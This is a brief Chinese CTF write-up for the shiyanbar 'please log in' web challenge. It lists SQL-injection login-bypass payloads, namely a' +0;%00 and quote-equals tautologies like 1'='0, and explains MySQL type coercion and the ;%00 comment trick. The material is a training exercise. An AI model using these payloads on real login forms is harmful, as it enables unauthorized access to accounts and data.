登陆一下好吗??
题目
不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈! flag格式:ctf{xxxx}
解题链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
write up
看了各个 writeup,总共有 2 种答案
答案一
post 提交
username=a’+0;%00&password=核心思想是:一个字符串类型的,当他接受到一个整型值切值为 0 的时候,就会返回数据库的所有条目。一个字符串加一个整形,会自动的变量类型转换,变为一个整型。
核心思想2:mysql的注释符除了 – + , # ,/**/ 之外,还有一个 ;%00
原理解释:http://blog.csdn.net/yalecaltech/article/details/63685280
答案二
username= 1’=’0
password= 1’=’0
# 或者
username= what’=’
password= what’=’
# 或者
username= admin’=’
password= admin’=’核心思想:
原理解释:【登陆一下好吗?? by pcat】
Last updated
Was this helpful?